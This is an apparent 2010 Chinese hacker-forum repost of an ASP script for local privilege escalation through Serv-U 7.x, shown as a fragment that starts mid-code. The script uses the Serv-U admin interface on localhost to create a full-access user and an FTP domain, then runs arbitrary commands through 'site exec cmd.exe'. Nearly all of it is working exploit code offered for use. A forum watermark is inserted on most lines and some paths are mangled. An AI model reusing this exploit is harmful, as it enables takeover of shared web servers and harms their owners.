支持serv-u 7.x的asp版本地提权
发表时间:2010-01-30 08:50:11 作者: 来源: 收藏本页
eXJ中国红客联盟-全球最大的红客组织
Response.write "error!"&"</br>"  eXJ中国红客联盟-全球最大的红客组织
end if  eXJ中国红客联盟-全球最大的红客组织
case 4  eXJ中国红客联盟-全球最大的红客组织
call main3()  eXJ中国红客联盟-全球最大的红客组织
case 5  eXJ中国红客联盟-全球最大的红客组织
returns=httpopen("","POST","http://127.0.0.1:"&port&"/Admin/XML/User.xml?Command=AddObject&Object=COrganization."&OrganizationId&".User&Temp=  eXJ中国红客联盟-全球最大的红客组织

1&Sync=546666666666666663","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)  eXJ中国红客联盟-全球最大的红客组织
userid=getmidstr("<var name=""ObjectID"" val=""",""" />",returns)  eXJ中国红客联盟-全球最大的红客组织
if userid<>"" then  eXJ中国红客联盟-全球最大的红客组织
Response.write "get userid "&userid&" ok!"&"</br>"  eXJ中国红客联盟-全球最大的红客组织
Response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId&"&userid="&userid  eXJ中国红客联盟-全球最大的红客组织
else  eXJ中国红客联盟-全球最大的红客组织
Response.write "error!"  eXJ中国红客联盟-全球最大的红客组织
end if  eXJ中国红客联盟-全球最大的红客组织

case 6  eXJ中国红客联盟-全球最大的红客组织
call main4()  eXJ中国红客联盟-全球最大的红客组织

case 7  eXJ中国红客联盟-全球最大的红客组织
returns=httpopen("LoginID="&user&"&FullName=&Password="&pass&"&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2F"&path&"&HomeDir=%2F"&path&"&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&  eXJ中国红客联盟-全球最大的红客组织

AlwaysAllowLogin=1&Description=&IncludeRespCodesInMsgFiles=&ComboSignOnMessageFilePath=  eXJ中国红客联盟-全球最大的红客组织

&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&Access=7999&MaxSize=0&Dir=%25HOME%25","POST","http://127.0.0.1:"&port&"/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization."&OrganizationId&".User."&userid&"&Sync=  eXJ中国红客联盟-全球最大的红客组织

1227071190250","http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)  eXJ中国红客联盟-全球最大的红客组织
Response.write "add user ok!"&"</br>"  eXJ中国红客联盟-全球最大的红客组织
Response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId  eXJ中国红客联盟-全球最大的红客组织

case 8  eXJ中国红客联盟-全球最大的红客组织
call main5()  eXJ中国红客联盟-全球最大的红客组织

case 9  eXJ中国红客联盟-全球最大的红客组织
returns=httpopen("Access=7999&MaxSize=0&Dir=%2F"&path&"&undefined=undefined","POST","http://127.0.0.1:"&port&"/Admin/XML/Result.xml?Command=AddObject&Object=CUser."&userid&".DirAccess&Sync=1227081437828","http://127.0.0.1:"&port&"/  eXJ中国红客联盟-全球最大的红客组织

Admin/  eXJ中国红客联盟-全球最大的红客组织

ServerUsers.htm?Page=1",sessionid)  eXJ中国红客联盟-全球最大的红客组织
Response.write "add user power ok!"&"</br>"  eXJ中国红客联盟-全球最大的红客组织
Response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId  eXJ中国红客联盟-全球最大的红客组织

case 10  eXJ中国红客联盟-全球最大的红客组织
call main6()  eXJ中国红客联盟-全球最大的红客组织

case 11  eXJ中国红客联盟-全球最大的红客组织
returns=httpopen("DomainName="&mydomain&"&Description=test1&Enabled=1&EnableFTP=1&EnableFTPS=0&  eXJ中国红客联盟-全球最大的红客组织

EnableSSH=0&EnableHTTP=0&EnableHTTPS=0&FTPPort="&ftpport&"&FTPSPort=990&SSHPort=  eXJ中国红客联盟-全球最大的红客组织

22&HTTPPort=80&HTTPSPort=443&BindIPAddress=&","POST","http://127.0.0.1:"&port&"/  eXJ中国红客联盟-全球最大的红客组织

Admin/XML/Result.xml?Command=ObjectCommand&Object=CServer.0.CreateDomain&Sync=1227081437828",  eXJ中国红客联盟-全球最大的红客组织

"http://127.0.0.1:"&port&"/Admin/ServerUsers.htm?Page=1",sessionid)  eXJ中国红客联盟-全球最大的红客组织
domainid=getmidstr("<ObjectID>","</ObjectID>",returns)  eXJ中国红客联盟-全球最大的红客组织
Response.write "create domain ok!"&"</br>"  eXJ中国红客联盟-全球最大的红客组织
Response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId=  eXJ中国红客联盟-全球最大的红客组织

"&OrganizationId&"&domainid="&domainid  eXJ中国红客联盟-全球最大的红客组织

case 12  eXJ中国红客联盟-全球最大的红客组织
call main7()  eXJ中国红客联盟-全球最大的红客组织

case 13  eXJ中国红客联盟-全球最大的红客组织
set b=Server.CreateObject("Microsoft.XMLHTTP")  eXJ中国红客联盟-全球最大的红客组织
b.open "GET", "http://127.0.0.1:"&ftpport&"/", false, "", ""  eXJ中国红客联盟-全球最大的红客组织
b.send "User " & user & vbCrLf & "pass "& pass & vbCrLf & "site exec c:windowssystem32cmd.exe /c "& cmd & vbCrLf & "QUIT" & vbCrLf 

豫ICP备09015648号版权所有© 2001-2009中国红客联盟 All Rights Reserved.